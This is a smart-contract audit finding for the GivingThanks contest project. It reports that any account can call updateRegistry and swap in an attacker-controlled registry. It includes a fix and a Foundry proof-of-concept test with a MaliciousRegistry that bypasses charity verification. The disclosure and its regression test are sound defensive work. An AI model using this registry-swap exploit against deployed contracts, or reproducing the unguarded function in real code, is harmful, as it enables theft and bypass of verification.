GivingThanks

First Flight #28
Tags: Beginner Friendly, Foundry
Submission Details
Severity: high
Valid

Missing access control in `GivingThanks::updateRegistry` function

Summary

Any account can call `GivingThanks::updateRegistry` and replace the `CharityRegistry` address the contract relies on, because the function performs no access control check on `msg.sender`.

Vulnerability Details

  1. The protocol owner deploys the `CharityRegistry` contract.

  2. Using that registry address, the owner deploys the `GivingThanks` contract.

  3. An attacker deploys a separate `CharityRegistry` (or any contract exposing the same interface) that they control.

  4. The attacker calls `GivingThanks::updateRegistry` with the address of their contract. Nothing in the function restricts who may call it, so the call succeeds.

  5. From that point on, every decision `GivingThanks` delegates to the registry (in particular, which charities count as verified) is answered by the attacker's contract, allowing them to manipulate the contract's behaviour.

Impact

Anyone can call `GivingThanks::updateRegistry` and change the `CharityRegistry` address. A malicious entity can redirect the registry to a contract they control and thereby bypass the charity verification process entirely, compromising the integrity of the whole system.

Tools Used

Manual, Remix IDE

Recommendations

To mitigate this issue, restrict `updateRegistry` to the contract owner or another privileged role. The simplest option is an explicit check against the stored admin address, as shown below; equivalently, inherit OpenZeppelin's `Ownable` and apply the `onlyOwner` modifier to the function.

```diff
function updateRegistry(address _registry) public {
+   require(msg.sender == admin, "not admin");
    registry = CharityRegistry(_registry);
}
```
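The scenario from the Vulnerability Details steps above and the fix from the Recommendations, as a runnable Foundry test. This is an added example, not the GivingThanks project's code: `CharityRegistry`, `MaliciousRegistry`, the `donate` function and the `GivingThanksFixed` contract are minimal stand-ins written for this illustration, and the example assumes forge-std and OpenZeppelin v5 are installed. The first test shows an attacker repointing the registry and then passing a verification check that had just rejected them; the second shows the `onlyOwner` variant reverting for the same caller.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not the audited project's code. Assumes Foundry with
// forge-std and OpenZeppelin v5; the contracts below are minimal stand-ins.
import {Test} from "forge-std/Test.sol";
import {Ownable} from "@openzeppelin/contracts/access/Ownable.sol";

// Stand-in registry (assumed shape): an admin marks charities verified.
contract CharityRegistry {
    address public admin;
    mapping(address => bool) public isVerified;

    constructor() {
        admin = msg.sender;
    }

    function verifyCharity(address charity) external {
        require(msg.sender == admin, "not admin");
        isVerified[charity] = true;
    }
}

// Attacker-controlled registry: reports every address as verified.
contract MaliciousRegistry {
    function isVerified(address) external pure returns (bool) {
        return true;
    }
}

// Vulnerable shape described in the finding: updateRegistry is open to all.
contract GivingThanksVulnerable {
    CharityRegistry public registry;

    constructor(address _registry) {
        registry = CharityRegistry(_registry);
    }

    function updateRegistry(address _registry) public {
        registry = CharityRegistry(_registry);
    }

    // Assumed donation path: only registry-verified charities receive funds.
    function donate(address charity) public payable {
        require(registry.isVerified(charity), "Charity not verified");
        (bool ok,) = charity.call{value: msg.value}("");
        require(ok, "transfer failed");
    }
}

// Hardened shape: only the owner may change the registry.
contract GivingThanksFixed is Ownable {
    CharityRegistry public registry;

    constructor(address _registry) Ownable(msg.sender) {
        registry = CharityRegistry(_registry);
    }

    function updateRegistry(address _registry) public onlyOwner {
        registry = CharityRegistry(_registry);
    }
}

contract UpdateRegistryTest is Test {
    address deployer = makeAddr("deployer");
    address attacker = makeAddr("attacker");
    address unverifiedCharity = makeAddr("unverifiedCharity");

    function test_anyoneCanSwapRegistryAndBypassVerification() public {
        vm.startPrank(deployer);
        CharityRegistry registry = new CharityRegistry();
        GivingThanksVulnerable gt = new GivingThanksVulnerable(address(registry));
        vm.stopPrank();

        vm.deal(attacker, 2 ether);

        // With the honest registry in place, the verification check holds.
        vm.prank(attacker);
        vm.expectRevert(bytes("Charity not verified"));
        gt.donate{value: 1 ether}(unverifiedCharity);

        // Attacker deploys a rogue registry and repoints GivingThanks at it;
        // the same donation now succeeds because the check was bypassed.
        vm.startPrank(attacker);
        MaliciousRegistry rogue = new MaliciousRegistry();
        gt.updateRegistry(address(rogue));
        gt.donate{value: 1 ether}(unverifiedCharity);
        vm.stopPrank();

        assertEq(address(gt.registry()), address(rogue));
        assertEq(unverifiedCharity.balance, 1 ether);
    }

    function test_fixedContractRejectsNonOwner() public {
        vm.startPrank(deployer);
        GivingThanksFixed gt = new GivingThanksFixed(address(new CharityRegistry()));
        vm.stopPrank();

        // Deploy the rogue registry first so the prank/expectRevert apply to
        // the updateRegistry call itself, not to the CREATE.
        MaliciousRegistry rogue = new MaliciousRegistry();
        vm.prank(attacker);
        vm.expectRevert(abi.encodeWithSelector(Ownable.OwnableUnauthorizedAccount.selector, attacker));
        gt.updateRegistry(address(rogue));
    }
}
```

Run with `forge test -vv` from a project that has both dependencies installed. The first test fails only if `updateRegistry` gains an access check, which makes it a useful regression test to keep alongside the fix.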
Updates

Lead Judging Commences

n0kto Lead Judge 8 months ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-anyone-can-change-registry

Likelihood: High, anyone can change it at any time.
Impact: High, can bypass the verification process.
